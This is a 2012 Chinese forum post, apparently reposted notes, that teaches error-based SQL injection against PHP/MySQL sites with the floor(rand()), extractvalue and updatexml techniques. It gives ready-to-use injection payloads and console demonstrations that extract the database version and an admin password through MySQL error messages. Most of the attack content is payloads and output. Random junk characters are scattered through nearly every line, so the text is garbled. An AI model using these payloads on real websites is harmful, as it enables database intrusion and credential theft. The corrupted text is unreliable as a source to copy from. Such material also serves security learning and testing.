放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。2 ]. I# o# O1 c2 v) Q H$ r! f
实际测试环境:
* s2 {% A/ u1 Y6 R' e Y L1 I
" s d" m* W* U+ X6 p6 umysql> show tables;2 N( \, f) L4 w2 A8 S
+----------------+
7 | A6 Q+ t" M| Tables_in_test |
5 I& G. n2 Z2 ]- w# i+----------------+1 ]) ?+ d( U6 M. |9 K9 j4 H
| admin |
7 N% i s# p) i9 F1 [0 Z2 o* A| article |
0 e' j, w" b1 J7 v+ m4 f# H+----------------+1 i5 L. M! `+ ]9 w) ~% a) ]
* k, b s# h# N0 J& i1 g
8 b7 l% L! E1 \: ` 1 @: a" S7 n5 W8 `' N, F7 O9 [
mysql> describe admin;& _' f: n X$ ]& O
+-------+------------------+------+-----+---------+----------------+
7 [6 l3 q `$ a6 E4 d3 a| Field | Type | Null | Key | Default | Extra |5 M$ |0 x- ^- I# g6 t& K
+-------+------------------+------+-----+---------+----------------+" ?3 J' l. ]) b$ v
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |2 B }! D- ^- u/ H- s6 ~! @- T0 b
| user | varchar(50) | NO | | NULL | |
7 R( f- R7 x# j| pass | varchar(50) | NO | | NULL | |, G. A! m! \1 f) U
+-------+------------------+------+-----+---------+----------------+0 W& H) ~/ S! n g0 a- A& f
4 o ~0 U- s/ ^; _6 d : D- d! q3 u7 F
# ?. C9 w' [% v7 e% g4 `
mysql> describe article; h3 G' Q4 O K0 H t5 }, ?
+---------+------------------+------+-----+---------+----------------+4 W* [/ P0 ^6 u6 W
| Field | Type | Null | Key | Default | Extra |6 E9 R' E9 Q" v D+ F B( _) x3 J- K
+---------+------------------+------+-----+---------+----------------+2 c' Q f; n5 x
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
( J1 {1 O3 p0 C) J9 x" t# z& w& W| title | varchar(50) | NO | | NULL | |' Q% J5 s# f6 y5 H! ]
| content | varchar(50) | NO | | NULL | |
3 i. t" D+ k, c8 l0 F+---------+------------------+------+-----+---------+----------------+4 Y, c l: m, Y7 ?/ _+ a2 g
1、通过floor报错& v. Y- F* T" c C
可以通过如下一些利用代码
" r4 `3 I9 d; e
Y0 d* ~" q, R' F! l' d- U; a9 L ) R+ A) ]9 q" a; Q: O* \9 H9 _ o
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
1 [, m! \9 [' v. t$ ^' @from information_schema.tables group by x)a);% w; t0 \' O# N: q' n% [2 x2 k; ?
3 l4 E- l t$ t( f- L& i( M( } $ Z; s! [2 ]. H( X9 N+ U8 `5 T$ z
and (select count(*) from (select 1 union select null union select !1)x
! K9 ]; I: o0 z$ y9 Xgroup by concat((select table_name from information_schema.tables limit 1),
, b& ~- G2 g: {' Efloor(rand(0)*2)));
5 B6 E; J% A: T举例如下:6 W3 O# E! A# O! P
首先进行正常查询:# J- `) Y. N$ [; ]2 M6 K j4 P
$ q7 d5 E: R: h- T# S9 k+ @
mysql> select * from article where id = 1;$ P$ @/ W, T0 R3 T1 [; E
+----+-------+---------+
; f1 q& }: h6 `# ~: g8 X* T| id | title | content |
2 n* Q8 i9 @7 w( L+----+-------+---------+
% C6 I0 P% r3 }7 W; a| 1 | test | do it | Y0 [ z* p5 O( s
+----+-------+---------+
& T! |* Q5 f" M2 l$ ` q' L+ N3 R假如id输入存在注入的话,可以通过如下语句进行报错。' R( g1 v( R6 J3 w& {+ D1 @, I' b
9 e8 T- a; v! d$ V. Q2 z x4 h# D7 P. e
7 F7 e& I7 j W1 ~( D* q* g2 P
mysql> select * from article where id = 1 and (select 1 from5 U7 ?: C7 |5 w
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);5 u4 m: E( a, _. X" s# X: V3 Y
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'8 p4 W4 _2 p A, `
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。6 V7 b" R" ] K5 q2 t5 d) n
例如我们需要查询管理员用户名和密码:$ Z. T" N/ J6 Q! ^! h
Method1:
7 ]# s/ I- t8 o, V6 y4 t
Y, q) D+ f$ L3 G. T / ]. C3 `0 `' K8 h: U* l& M4 B
mysql> select * from article where id = 1 and (select 1 from
( r1 q# C% c( I' R(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x5 M9 p# ^* L. n3 X# [7 v6 I; Y/ _
from information_schema.tables group by x)a);
1 K" u# v- D; q7 gERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
/ N) Y' d# F6 Y4 _- {Method2:
8 R# \) x- P+ `/ \( X' [: C5 W4 Q : T6 R2 r% t: f" W' W
6 X; G. d @5 y5 W; O. P
mysql> select * from article where id = 1 and (select count(*)' k' X/ D9 s+ d6 @' y f3 [
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),& r7 y; n9 L1 h" }
floor(rand(0)*2))); K$ ^8 |9 j8 V5 q) H
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'. a' n0 c1 \, U) s3 M
2、ExtractValue; s) a+ Z O- j9 w! ?8 h; Q# `
测试语句如下
% c" j# o Z2 @) L9 _ , ^0 v( y! X' L
|% B/ k5 d5 \' }" G$ o! U4 land extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));! _" n! k2 ]6 Z( x
实际测试过程" }, W8 ] C R/ o; R s; {4 C6 F
/ A: e) d0 y; e" \ # k" u: o$ p" \) v" ~
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,. F& {, X1 P% |, g$ G4 S& n
(select pass from admin limit 1)));--: ^* o& L5 F1 K$ p( n# U5 v) t
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
" V" ^+ e- ?7 Y( \ }( J3、UpdateXml+ \. J2 A/ N; A; [
测试语句
3 u4 F8 g v2 S % H. W1 m# ~5 d9 W4 v; D* \
& R, x& Y h2 B6 S. G/ Nand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
, J+ s# c) G5 g& e" x# G) N9 h实际测试过程
' g* G/ v2 B- a1 D0 y4 p
0 T( x) [# Q& ]$ S5 I% Y 4 [( i- B) m8 B
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
4 M9 O% O# E+ S8 F L(select pass from admin limit 1),0x5e24),1));
% u2 ]0 q; ~: pERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'9 j4 T5 C3 h2 U3 h( ~
All, thanks foreign guys.0 y( k1 L7 |# I
6 ?" r3 C" ^* g) _
( M B! I$ w1 c0 N, \3 y, K( \! X) V$ W |
发表于 2012-12-10 10:28:51
收藏
支持
反对